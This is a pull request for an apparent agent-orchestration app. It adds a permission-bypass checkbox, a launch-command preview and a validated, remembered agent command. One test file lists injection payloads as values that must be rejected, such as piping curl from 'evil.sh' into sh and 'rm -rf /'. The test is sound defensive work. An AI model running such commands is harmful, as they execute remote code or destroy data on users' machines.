### PR TITLE
Add a skip-permissions checkbox to fan-out and remember the launch command

### DIFF
--- a/changelog.d/780.md
+++ b/changelog.d/780.md
@@ -1,0 +1,3 @@
+### Added
+
+- **Fan-out can launch in bypass mode without retyping the flag.** The Multi Task dialog now offers `--dangerously-skip-permissions` as a checkbox, shows the launch command it will fire, and prefills the command the last fan-out actually used. The checkbox appears only for Claude Code, the launcher wmux knows that flag for; users of another CLI type their own bypass flag once and it is remembered. A Claude-only flag left behind after switching launchers is called out with a one-click removal.

--- a/src/renderer/components/AgentToolbar/FanOutDialog.tsx
+++ b/src/renderer/components/AgentToolbar/FanOutDialog.tsx
@@ -19,6 +19,16 @@ import { useT } from '../../hooks/useT';
 import { t } from '../../i18n';
 import Button from '../ui/Button';
 import Input from '../ui/Input';
+import {
+  SKIP_PERMISSIONS_FLAG,
+  applySkipPermissions,
+  hasSkipPermissions,
+  fanoutAgentStem,
+  hasStaleSkipPermissions,
+  loadLastAgentCmd,
+  saveLastAgentCmd,
+  supportsSkipPermissions,
+} from './fanoutAgentCmd';
 
 // 리뷰 발견(Codex+GLM+Claude 3/3 합의) — compete 모드에서 `mode === 'parallel' ?
 // taskPrompts : []`처럼 인라인 배열 리터럴을 useEffect 의존성에 넣으면 매 렌더마다
@@ -65,7 +75,10 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
   const [titlesEdited, setTitlesEdited] = useState<boolean[]>([]);
   const [taskPrompts, setTaskPrompts] = useState<string[]>([]);
   const [repoPath, setRepoPath] = useState(defaultRepo);
-  const [agentCmd, setAgentCmd] = useState('claude');
+  // Prefilled with the command the last fan-out actually launched. wmux only
+  // knows Claude Code's bypass flag, so a Codex (or other CLI) user types their
+  // own flag once and it survives into the next fan-out.
+  const [agentCmd, setAgentCmd] = useState(() => loadLastAgentCmd() || 'claude');
   const [submitting, setSubmitting] = useState(false);
 
   // repo 기본값이 늦게 로드되면 반영.
@@ -113,6 +126,17 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
   // 정보성 힌트일 뿐 제출을 막지 않는다(§7 — 환경만 조성도 정당한 사용).
   const promptAllEmpty = effectiveBytes.every((b) => b === 0);
 
+  // The checkbox is a projection of the agentCmd string, not a second state:
+  // typing the flag by hand ticks it, unchecking strips it. That is what keeps
+  // the preview below identical to what the task pane will launch.
+  const effectiveAgentCmd = agentCmd.trim() || 'claude';
+  const canSkipPermissions = supportsSkipPermissions(effectiveAgentCmd);
+  const skipPermissions = hasSkipPermissions(effectiveAgentCmd);
+  // Switching `claude --dangerously-skip-permissions` over to another launcher
+  // would otherwise hide the checkbox with the Claude-only flag still on the
+  // line — and fire it at a CLI that rejects it (panel review, GLM).
+  const staleSkipPermissions = hasStaleSkipPermissions(effectiveAgentCmd);
+
   const setTitleAt = useCallback((k: number, v: string) => {
     setTitles((prev) => {
       const next = [...prev];
@@ -156,12 +180,16 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
         titles: titles.slice(0, n),
         taskPrompts: Array.from({ length: n }, (_, k) => effectiveTaskPrompts[k] ?? ''),
         repoPath: repoPath.trim(),
-        agentCmd: agentCmd.trim() || 'claude',
+        agentCmd: effectiveAgentCmd,
         // 렌더러 신뢰 신원(§2 — channelLocal과 동일 trust basis). owner = 생성자
         // (스펙 §5.1 born-owned=createdBy)라 활성 워크스페이스로 고정한다. CEO 자동
         // 승격은 하지 않는다(생성자 소유권을 CEO로 뭉개면 born-owned 계약 위반).
         verifiedWorkspaceId: activeWorkspace?.id ?? '',
       });
+      // Remember the command that actually launched (next dialog prefills it).
+      // Only when a task really started: a preflight rejection launches nothing,
+      // and overwriting the memory with it would lose a working command.
+      if (didLaunch(res)) saveLastAgentCmd(effectiveAgentCmd);
       // owner(부모) ws id = fan-out을 실행한 활성 워크스페이스(§5.1 born-owned).
       reportResult(res, pushToast, activeWorkspace?.id ?? '');
       // fan-out 완료 직후 미션 캐시 즉시 refetch(순수 pull이라 push가 없다 —
@@ -174,7 +202,7 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
     } finally {
       setSubmitting(false);
     }
-  }, [submitting, prompt, promptOverCap, repoPath, titles, effectiveTaskPrompts, n, agentCmd, activeWorkspace, pushToast, t]);
+  }, [submitting, prompt, promptOverCap, repoPath, titles, effectiveTaskPrompts, n, effectiveAgentCmd, activeWorkspace, pushToast, t]);
 
   const label = 'text-[11px] text-[var(--text-sub)] mb-1 block';
 
@@ -290,7 +318,58 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
       <Input className="mb-2 font-mono text-[12px]" value={repoPath} onChange={(e) => setRepoPath(e.target.value)} data-testid="fanout-repo" />
 
       <label className={label}>{t('fanout.agentLabel')}</label>
-      <Input className="mb-3 font-mono text-[12px]" value={agentCmd} onChange={(e) => setAgentCmd(e.target.value)} data-testid="fanout-agent" />
+      <Input className="mb-2 font-mono text-[12px]" value={agentCmd} onChange={(e) => setAgentCmd(e.target.value)} data-testid="fanout-agent" />
+
+      {canSkipPermissions ? (
+        <label className="mb-1 flex items-center gap-2 cursor-pointer select-none text-[11px] text-[var(--text-sub)]">
+          <input
+            type="checkbox"
+            checked={skipPermissions}
+            // Toggle the EFFECTIVE command, not the raw field: with the field
+            // empty the preview already reads `claude`, so toggling the raw ''
+            // silently did nothing (panel review, Codex).
+            onChange={(e) => setAgentCmd(applySkipPermissions(effectiveAgentCmd, e.target.checked))}
+            style={{ accentColor: 'var(--accent-cursor)', cursor: 'pointer', margin: 0 }}
+            data-testid="fanout-skip-permissions"
+          />
+          <span className="font-mono">{SKIP_PERMISSIONS_FLAG}</span>
+        </label>
+      ) : staleSkipPermissions ? (
+        <div className="mb-1 flex items-center gap-2 text-[10px] text-[var(--accent-red)]" data-testid="fanout-skip-permissions-stale">
+          <span>{t('fanout.skipPermissionsStale', { agent: fanoutAgentStem(effectiveAgentCmd) })}</span>
+          <button
+            type="button"
+            className="shrink-0 rounded-[4px] border border-[var(--bg-overlay)] px-1.5 py-0.5 text-[10px] text-[var(--text-sub)] hover:border-[var(--text-muted)]"
+            onClick={() => setAgentCmd(applySkipPermissions(effectiveAgentCmd, false))}
+            data-testid="fanout-skip-permissions-strip"
+          >
+            {t('fanout.skipPermissionsStrip')}
+          </button>
+        </div>
+      ) : (
+        <div className="mb-1 text-[10px] text-[var(--text-muted)]" data-testid="fanout-skip-permissions-unsupported">
+          {t('fanout.skipPermissionsUnsupported')}
+        </div>
+      )}
+      {skipPermissions && canSkipPermissions && (
+        <div className="mb-1 text-[10px] text-[var(--accent-red)]">{t('fanout.skipPermissionsWarning')}</div>
+      )}
+
+      {/* Launch command — the line the task pane fires, and the value remembered
+          for the next fan-out. main appends the prompt file as one argument
+          (FanOutService.buildInitialCommand), so show that too rather than
+          claiming a bare agent command is the whole line (panel review, 2/2). */}
+      <label className={label}>{t('fanout.commandPreviewLabel')}</label>
+      <code
+        className="mb-3 block rounded-[4px] border border-[var(--bg-overlay)] bg-[var(--bg-base)] px-1.5 py-1 font-mono text-[11px] text-[var(--text-sub)] select-text"
+        style={{ overflowWrap: 'anywhere', whiteSpace: 'pre-wrap' }}
+        data-testid="fanout-command-preview"
+      >
+        {effectiveAgentCmd}
+        {!promptAllEmpty && (
+          <span className="text-[var(--text-muted)]"> {t('fanout.commandPreviewPromptArg')}</span>
+        )}
+      </code>
 
       <div className="flex items-center justify-end gap-2">
         <Button variant="secondary" onClick={onClose}>
@@ -307,6 +386,14 @@ export default function FanOutDialog({ onClose, align = 'left' }: FanOutDialogPr
       </div>
     </div>
   );
+}
+
+/** Whether the call actually started a task — a rejected or all-failed fan-out
+ *  must not overwrite the remembered command. */
+function didLaunch(res: unknown): boolean {
+  const r = (res ?? {}) as FanOutResultLike;
+  if (r.error) return false;
+  return (r.tasks ?? []).some((task) => task.ok);
 }
 
 /** 결과 리포트 → 토스트(미물질화·채널 미연결·프롬프트 미발사 구분 — §7). */

--- a/src/renderer/components/AgentToolbar/__tests__/FanOutDialog.skipPermissions.dynamic.test.tsx
+++ b/src/renderer/components/AgentToolbar/__tests__/FanOutDialog.skipPermissions.dynamic.test.tsx
@@ -1,0 +1,98 @@
+// @vitest-environment jsdom
+//
+// Dynamic test for the fan-out dialog's skip-permissions checkbox and launch
+// command preview. Mounts the real <FanOutDialog/> and drives the checkbox /
+// agent command field, asserting the preview stays WYSIWYG with what the task
+// pane would launch. The packaged Electron UI can't be automated, so this jsdom
+// harness is the verification surface.
+
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import { createElement, act } from 'react';
+import { createRoot, type Root } from 'react-dom/client';
+
+import FanOutDialog from '../FanOutDialog';
+import { SKIP_PERMISSIONS_FLAG } from '../fanoutAgentCmd';
+
+let container: HTMLDivElement;
+let root: Root;
+
+beforeEach(() => {
+  localStorage.clear();
+  container = document.createElement('div');
+  document.body.appendChild(container);
+  root = createRoot(container);
+  act(() => root.render(createElement(FanOutDialog, { onClose: vi.fn() })));
+});
+
+afterEach(() => {
+  act(() => root.unmount());
+  container.remove();
+});
+
+const q = <T extends HTMLElement>(id: string): T | null => container.querySelector(`[data-testid="${id}"]`);
+const preview = (): string => q('fanout-command-preview')?.textContent ?? '';
+
+/** React tracks input value natively — set it through the prototype setter. */
+function typeAgentCmd(value: string): void {
+  const input = q<HTMLInputElement>('fanout-agent') as HTMLInputElement;
+  const setter = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value')?.set;
+  act(() => {
+    setter?.call(input, value);
+    input.dispatchEvent(new Event('input', { bubbles: true }));
+  });
+}
+
+describe('FanOutDialog — skip permissions', () => {
+  it('starts on the default claude command with the flag off', () => {
+    const box = q<HTMLInputElement>('fanout-skip-permissions');
+    expect(box).not.toBeNull();
+    expect(box?.checked).toBe(false);
+    expect(preview()).toBe('claude');
+  });
+
+  it('checking the box appends the flag to the launch command', () => {
+    const box = q<HTMLInputElement>('fanout-skip-permissions') as HTMLInputElement;
+    act(() => {
+      box.click();
+    });
+    expect(preview()).toBe(`claude ${SKIP_PERMISSIONS_FLAG}`);
+    expect(q<HTMLInputElement>('fanout-skip-permissions')?.checked).toBe(true);
+    // ...and unchecking strips it again.
+    act(() => {
+      (q<HTMLInputElement>('fanout-skip-permissions') as HTMLInputElement).click();
+    });
+    expect(preview()).toBe('claude');
+  });
+
+  it('typing the flag by hand ticks the box (the command is the source of truth)', () => {
+    typeAgentCmd(`claude ${SKIP_PERMISSIONS_FLAG} --model haiku`);
+    expect(q<HTMLInputElement>('fanout-skip-permissions')?.checked).toBe(true);
+    expect(preview()).toBe(`claude ${SKIP_PERMISSIONS_FLAG} --model haiku`);
+  });
+
+  it('hides the box for a non-claude launcher and points the user at their own flag', () => {
+    typeAgentCmd('codex');
+    expect(q('fanout-skip-permissions')).toBeNull();
+    expect(q('fanout-skip-permissions-unsupported')).not.toBeNull();
+    expect(preview()).toBe('codex');
+  });
+
+  it('toggles from an empty field, where the preview already reads claude', () => {
+    typeAgentCmd('');
+    expect(preview()).toBe('claude');
+    act(() => {
+      (q<HTMLInputElement>('fanout-skip-permissions') as HTMLInputElement).click();
+    });
+    expect(preview()).toBe(`claude ${SKIP_PERMISSIONS_FLAG}`);
+  });
+
+  it('offers to strip a claude-only flag left behind on another launcher', () => {
+    typeAgentCmd(`codex ${SKIP_PERMISSIONS_FLAG}`);
+    expect(q('fanout-skip-permissions-stale')).not.toBeNull();
+    act(() => {
+      (q<HTMLButtonElement>('fanout-skip-permissions-strip') as HTMLButtonElement).click();
+    });
+    expect(preview()).toBe('codex');
+    expect(q('fanout-skip-permissions-stale')).toBeNull();
+  });
+});

--- a/src/renderer/components/AgentToolbar/__tests__/fanoutAgentCmd.test.ts
+++ b/src/renderer/components/AgentToolbar/__tests__/fanoutAgentCmd.test.ts
@@ -1,0 +1,133 @@
+// fan-out agent command helpers: the skip-permissions checkbox projection and
+// the remembered last launch command.
+
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import {
+  SKIP_PERMISSIONS_FLAG,
+  applySkipPermissions,
+  fanoutAgentStem,
+  hasSkipPermissions,
+  hasStaleSkipPermissions,
+  loadLastAgentCmd,
+  saveLastAgentCmd,
+  supportsSkipPermissions,
+} from '../fanoutAgentCmd';
+
+describe('fanoutAgentStem', () => {
+  it('reads the launcher stem through a path, extension and quotes', () => {
+    expect(fanoutAgentStem('claude')).toBe('claude');
+    expect(fanoutAgentStem('  claude --model haiku ')).toBe('claude');
+    expect(fanoutAgentStem('"C:\\tools\\claude.cmd" --x')).toBe('claude');
+    // A quoted path with a space stays one token (panel review, Codex).
+    expect(fanoutAgentStem('"C:\\Program Files\\claude.cmd" --x')).toBe('claude');
+    expect(fanoutAgentStem('codex --model o3')).toBe('codex');
+    expect(fanoutAgentStem('')).toBe('');
+  });
+});
+
+describe('supportsSkipPermissions', () => {
+  it('is claude-only — wmux never guesses another CLI\'s bypass flag', () => {
+    expect(supportsSkipPermissions('claude --model haiku')).toBe(true);
+    expect(supportsSkipPermissions('codex')).toBe(false);
+    expect(supportsSkipPermissions('gemini')).toBe(false);
+  });
+});
+
+describe('hasSkipPermissions', () => {
+  it('matches the flag as a whole token only', () => {
+    expect(hasSkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG}`)).toBe(true);
+    expect(hasSkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG} --model haiku`)).toBe(true);
+    expect(hasSkipPermissions('claude')).toBe(false);
+    expect(hasSkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG}-nope`)).toBe(false);
+  });
+
+  it('ignores the flag inside a quoted argument (panel review, Codex)', () => {
+    expect(hasSkipPermissions(`claude --append-system-prompt "never use ${SKIP_PERMISSIONS_FLAG}"`)).toBe(false);
+  });
+});
+
+describe('hasStaleSkipPermissions', () => {
+  it('flags a claude-only flag left on another launcher', () => {
+    expect(hasStaleSkipPermissions(`codex ${SKIP_PERMISSIONS_FLAG}`)).toBe(true);
+    expect(hasStaleSkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG}`)).toBe(false);
+    expect(hasStaleSkipPermissions('codex')).toBe(false);
+  });
+});
+
+describe('applySkipPermissions', () => {
+  it('appends the flag once when checked', () => {
+    expect(applySkipPermissions('claude', true)).toBe(`claude ${SKIP_PERMISSIONS_FLAG}`);
+    expect(applySkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG}`, true)).toBe(`claude ${SKIP_PERMISSIONS_FLAG}`);
+  });
+
+  it('strips the flag when unchecked, leaving the rest of the command intact', () => {
+    expect(applySkipPermissions(`claude ${SKIP_PERMISSIONS_FLAG} --model haiku`, false)).toBe('claude --model haiku');
+    expect(applySkipPermissions('claude --model haiku', false)).toBe('claude --model haiku');
+  });
+
+  it('never adds the claude flag to another launcher, and strips a stale one', () => {
+    expect(applySkipPermissions('codex', true)).toBe('codex');
+    expect(applySkipPermissions(`codex ${SKIP_PERMISSIONS_FLAG}`, false)).toBe('codex');
+  });
+
+  it('leaves a quoted occurrence alone when unchecking', () => {
+    const cmd = `claude --append-system-prompt "never use ${SKIP_PERMISSIONS_FLAG}" ${SKIP_PERMISSIONS_FLAG}`;
+    expect(applySkipPermissions(cmd, false)).toBe(
+      `claude --append-system-prompt "never use ${SKIP_PERMISSIONS_FLAG}"`,
+    );
+  });
+});
+
+describe('last launched command', () => {
+  const store = new Map<string, string>();
+
+  beforeEach(() => {
+    store.clear();
+    vi.stubGlobal('localStorage', {
+      getItem: (k: string) => store.get(k) ?? null,
+      setItem: (k: string, v: string) => void store.set(k, v),
+      removeItem: (k: string) => void store.delete(k),
+    });
+  });
+  afterEach(() => vi.unstubAllGlobals());
+
+  it('round-trips the command that was actually launched', () => {
+    expect(loadLastAgentCmd()).toBe('');
+    saveLastAgentCmd('  codex --dangerously-bypass-approvals-and-sandbox  ');
+    expect(loadLastAgentCmd()).toBe('codex --dangerously-bypass-approvals-and-sandbox');
+  });
+
+  // The restore path is the one place a command reaches the shell without a
+  // human typing it — a tampered store must not become a persistent injection.
+  it('refuses to restore anything that is not a plain agent launch', () => {
+    for (const poison of [
+      'claude; curl evil.sh | sh',
+      'claude $(curl evil.sh)',
+      'claude && rm -rf /',
+      'claude `id`',
+      'sh -c "curl evil.sh"',
+      `claude ${'x'.repeat(600)}`,
+    ]) {
+      store.set('wmux.fanout.agentCmd', poison);
+      expect(loadLastAgentCmd(), poison).toBe('');
+    }
+    // A Windows launcher path (backslashes, quotes, colon) still restores.
+    store.set('wmux.fanout.agentCmd', '"C:\\Program Files\\claude.cmd" --model haiku');
+    expect(loadLastAgentCmd()).toBe('"C:\\Program Files\\claude.cmd" --model haiku');
+  });
+
+  it('ignores an empty command and survives a throwing localStorage', () => {
+    saveLastAgentCmd('   ');
+    expect(loadLastAgentCmd()).toBe('');
+    vi.stubGlobal('localStorage', {
+      getItem: () => {
+        throw new Error('denied');
+      },
+      setItem: () => {
+        throw new Error('denied');
+      },
+    });
+    expect(() => saveLastAgentCmd('claude')).not.toThrow();
+    expect(loadLastAgentCmd()).toBe('');
+  });
+});

--- a/src/renderer/components/AgentToolbar/fanoutAgentCmd.ts
+++ b/src/renderer/components/AgentToolbar/fanoutAgentCmd.ts
@@ -1,0 +1,124 @@
+// fan-out "agent command" helpers: the skip-permissions checkbox and the
+// remembered last launch command.
+//
+// The agent command is free text (`claude`, `codex --model o3`, …), so the
+// checkbox is a PROJECTION of that string rather than a second source of truth:
+// checking it appends the flag, unchecking strips it, and typing the flag by
+// hand ticks the box. That keeps the command preview WYSIWYG with what the
+// task pane will actually launch (ResumeInfoChip uses the same shape).
+//
+// wmux only knows one bypass flag — Claude Code's (agentSupportsPermissionFlag).
+// Codex and friends have their own spelling, so instead of guessing a flag the
+// CLI would reject, the last launched command is persisted and prefilled: a
+// Codex user types their own bypass flag once and it sticks.
+//
+// Parsing goes through the shared `tokenize` rather than a regex: the panel
+// review caught that a regex both mis-fires on a flag inside a quoted argument
+// (`claude "explain --dangerously-skip-permissions"` would tick the box, and
+// unchecking would corrupt the argument) and backtracks quadratically on long
+// whitespace runs. Tokenizing is linear, quote-aware, and agrees with the resume
+// builder on what a launcher token is.
+
+import { PERMISSION_FLAG, agentSupportsPermissionFlag, launcherStem, tokenize } from '../../../shared/agentResume';
+import { KNOWN_AGENT_STEMS } from '../../../shared/orchestratorRole';
+
+/** The only bypass flag wmux assembles itself (Claude Code). */
+export const SKIP_PERMISSIONS_FLAG = PERMISSION_FLAG.bypassPermissions;
+
+/** Launcher stem of a free-text agent command: `"C:\tools\claude.cmd" --x` → `claude`. */
+export function fanoutAgentStem(agentCmd: string): string {
+  const first = tokenize(agentCmd)[0];
+  return first ? launcherStem(first.value) : '';
+}
+
+/** Whether wmux knows a bypass flag for this command's launcher (Claude only). */
+export function supportsSkipPermissions(agentCmd: string): boolean {
+  return agentSupportsPermissionFlag(fanoutAgentStem(agentCmd));
+}
+
+/** Whether the command carries the flag as its own UNQUOTED token. */
+export function hasSkipPermissions(agentCmd: string): boolean {
+  return tokenize(agentCmd).some((tok) => !tok.quoted && tok.value === SKIP_PERMISSIONS_FLAG);
+}
+
+/**
+ * Drop every unquoted flag token, leaving the rest of the command byte-identical
+ * (each kept token is spliced back with the whitespace that preceded it).
+ */
+function stripSkipPermissions(agentCmd: string): string {
+  let out = '';
+  let cursor = 0;
+  for (const tok of tokenize(agentCmd)) {
+    // The segment carries this token's leading whitespace, so dropping it drops
+    // the separator with it — no double space where the flag used to be.
+    if (tok.quoted || tok.value !== SKIP_PERMISSIONS_FLAG) out += agentCmd.slice(cursor, tok.end);
+    cursor = tok.end;
+  }
+  return (out + agentCmd.slice(cursor)).trim();
+}
+
+/**
+ * Reflect the checkbox onto the command. `on` appends the flag once (only for a
+ * launcher wmux knows it for); `off` strips every occurrence.
+ */
+export function applySkipPermissions(agentCmd: string, on: boolean): string {
+  const stripped = stripSkipPermissions(agentCmd);
+  if (!on || !supportsSkipPermissions(stripped)) return stripped;
+  return `${stripped} ${SKIP_PERMISSIONS_FLAG}`;
+}
+
+/** True when the command carries a Claude-only flag its launcher won't accept. */
+export function hasStaleSkipPermissions(agentCmd: string): boolean {
+  return hasSkipPermissions(agentCmd) && !supportsSkipPermissions(agentCmd);
+}
+
+// ─── Last launched command (survives a reload — localStorage) ─────────────────
+
+const STORAGE_KEY = 'wmux.fanout.agentCmd';
+
+/** A prefill is a convenience, never a blank cheque — cap what we will restore. */
+const MAX_RESTORED_LENGTH = 512;
+
+/** Shell metacharacters. main interpolates agentCmd UNQUOTED into the PTY line
+ *  (`FanOutService.buildInitialCommand`), so a restored value that carries any
+ *  of these could run a second command the user never typed. Backslash, quotes,
+ *  `:` and `/` stay legal — a Windows launcher path needs them. */
+const SHELL_METACHARS = /[;&|`$(){}<>\n\r]/;
+
+/**
+ * Whether a value read back from storage is safe to prefill. The panel review
+ * (Codex+GLM, both CRITICAL) flagged the restore path as a persistent injection
+ * surface: whatever sits in storage is auto-loaded and fired at a shell on the
+ * next Spawn without anyone re-typing it. A typed command is trusted (the human
+ * is right there); a RESTORED one is not, so it must look like a plain agent
+ * launch — a known agent CLI plus flags, no shell operators.
+ */
+function isRestorableAgentCmd(value: string): boolean {
+  if (value.length === 0 || value.length > MAX_RESTORED_LENGTH) return false;
+  if (SHELL_METACHARS.test(value)) return false;
+  return KNOWN_AGENT_STEMS.has(fanoutAgentStem(value));
+}
+
+/** The last successfully launched agent command, or '' when there is none (or
+ *  the stored value no longer looks like a plain agent launch). */
+export function loadLastAgentCmd(): string {
+  try {
+    if (typeof localStorage === 'undefined') return '';
+    const raw = (localStorage.getItem(STORAGE_KEY) ?? '').trim();
+    return isRestorableAgentCmd(raw) ? raw : '';
+  } catch {
+    // localStorage unavailable (private mode / test env) → no memory, no crash.
+    return '';
+  }
+}
+
+/** Remember the command a fan-out actually launched. */
+export function saveLastAgentCmd(agentCmd: string): void {
+  try {
+    if (typeof localStorage === 'undefined') return;
+    const v = agentCmd.trim();
+    if (v.length > 0) localStorage.setItem(STORAGE_KEY, v);
+  } catch {
+    // Persisting the convenience prefill must never break a launch.
+  }
+}

--- a/src/renderer/i18n/locales/en.ts
+++ b/src/renderer/i18n/locales/en.ts
@@ -1264,6 +1264,13 @@ export const en = {
   'fanout.taskPromptPlaceholder': 'Task {k} instructions… (combined with the shared prompt; empty = shared only)',
   'fanout.repoLabel': 'repo path',
   'fanout.agentLabel': 'agent command',
+  'fanout.skipPermissionsUnsupported':
+    'wmux only knows this bypass flag for `claude`. Type your agent\'s own flag into the command above — it is remembered for next time.',
+  'fanout.skipPermissionsWarning': 'Every tool runs without asking. Tasks run in isolated worktrees, but the agent still has full shell access.',
+  'fanout.skipPermissionsStale': '`{agent}` does not take this Claude-only flag, but the command still carries it.',
+  'fanout.skipPermissionsStrip': 'Remove flag',
+  'fanout.commandPreviewLabel': 'launch command (remembered for next time)',
+  'fanout.commandPreviewPromptArg': '"$(cat <prompt file>)"',
   'fanout.cancel': 'Cancel',
   'fanout.spawning': 'Spawning…',
   'fanout.spawn': 'Spawn {n}',

--- a/src/renderer/i18n/locales/ko.ts
+++ b/src/renderer/i18n/locales/ko.ts
@@ -1040,6 +1040,13 @@ export const ko = {
   'fanout.taskPromptPlaceholder': '태스크 {k} 개별 지시… (공통 프롬프트와 결합, 비우면 공통만)',
   'fanout.repoLabel': 'repo 경로',
   'fanout.agentLabel': 'agent 명령',
+  'fanout.skipPermissionsUnsupported':
+    'wmux가 아는 우회 플래그는 `claude` 것뿐입니다. 위 명령에 사용하는 CLI의 플래그를 직접 입력하세요 — 다음 실행에도 그대로 남습니다.',
+  'fanout.skipPermissionsWarning': '모든 도구가 확인 없이 실행됩니다. 태스크는 격리 worktree에서 돌지만 에이전트는 셸 전체를 씁니다.',
+  'fanout.skipPermissionsStale': '`{agent}`는 claude 전용 플래그를 받지 않는데 명령에 아직 남아 있습니다.',
+  'fanout.skipPermissionsStrip': '플래그 제거',
+  'fanout.commandPreviewLabel': '실행 명령 (다음에도 유지)',
+  'fanout.commandPreviewPromptArg': '"$(cat <프롬프트 파일>)"',
   'fanout.cancel': '취소',
   'fanout.spawning': '스폰 중…',
   'fanout.spawn': '{n}개 스폰',

--- a/src/shared/orchestratorRole.ts
+++ b/src/shared/orchestratorRole.ts
@@ -143,7 +143,7 @@ export function bindingEnforcesModel(binding: RoleBinding | undefined): boolean 
  *  launching a DIFFERENT known agent than the role names is a policy deviation
  *  the operator should hear about. Mirrors the AgentSlug vocabulary
  *  (shared/events.ts). */
-const KNOWN_AGENT_STEMS: ReadonlySet<string> = new Set([
+export const KNOWN_AGENT_STEMS: ReadonlySet<string> = new Set([
   'claude',
   'codex',
   'gemini',


### PR DESCRIPTION
## What

Multi Task (fan-out) launched whatever sat in the **agent command** field, and that field reset to `claude` on every open. Running a fleet in bypass mode meant typing `--dangerously-skip-permissions` by hand every single launch, and a Codex user retyped their whole command each time.

The dialog now has:

- a **`--dangerously-skip-permissions` checkbox** next to the agent command,
- a **launch command preview** — the line the task pane will actually fire, including the appended prompt-file argument,
- **memory**: the command the last fan-out really launched is prefilled next time.

## How

The checkbox is a *projection* of the command string, not a second source of truth — typing the flag by hand ticks it, unchecking strips it. That is what keeps the preview honest.

It only appears for a launcher wmux knows the flag for (Claude Code), matching the rule the resume chip already follows (`agentSupportsPermissionFlag`): a Codex user is never shown a flag their CLI rejects. Instead they type their own bypass flag once and the memory keeps it. If that Claude-only flag is left behind after switching launchers, the dialog says so and offers a one-click **Remove**.

Parsing goes through the shared `tokenize`, so:

- a flag inside a quoted argument (`claude --append-system-prompt "never use --dangerously-skip-permissions"`) is neither counted nor destroyed on toggle,
- a quoted launcher path with a space (`"C:\Program Files\claude.cmd"`) still resolves to the `claude` stem.

The **restored** command is validated before it is prefilled: known agent launcher, no shell metacharacters, length-capped. main interpolates `agentCmd` unquoted into the PTY line, and the restore path is the one place a command reaches a shell without a human typing it — a typed command is trusted, a remembered one is checked.

`KNOWN_AGENT_STEMS` is exported from `orchestratorRole.ts` for that check (previously module-private).

## Tests

- `fanoutAgentCmd.test.ts` — 18 assertions across stem parsing, the claude-only gate, quote-aware detection/stripping, stale-flag detection, and restore validation (injection payloads rejected, Windows launcher path accepted).
- `FanOutDialog.skipPermissions.dynamic.test.tsx` — 6 cases driving the real dialog in jsdom: default state, check/uncheck round trip, hand-typed flag syncing the box, non-claude launcher hiding it, toggling from an empty field, and the stale-flag Remove button.

`tsc --noEmit` clean; full `test:parallel` shows only the two failures already present on this base (`genApiReference` drift guard, `deck.handler.loop`).

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Fan-out remembers the most recently launched command.
  * Added a permission-bypass toggle for supported Claude commands.
  * Added command previews and warnings for unsupported or outdated flags.
  * Improved handling of prompt-file arguments and launch outcomes.
  * Added Korean localization for the new fan-out messaging.

* **Bug Fixes**
  * Safely removes stale permission flags and rejects unsafe command restoration.

* **Tests**
  * Added coverage for command parsing, flag handling, persistence, and dialog interactions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->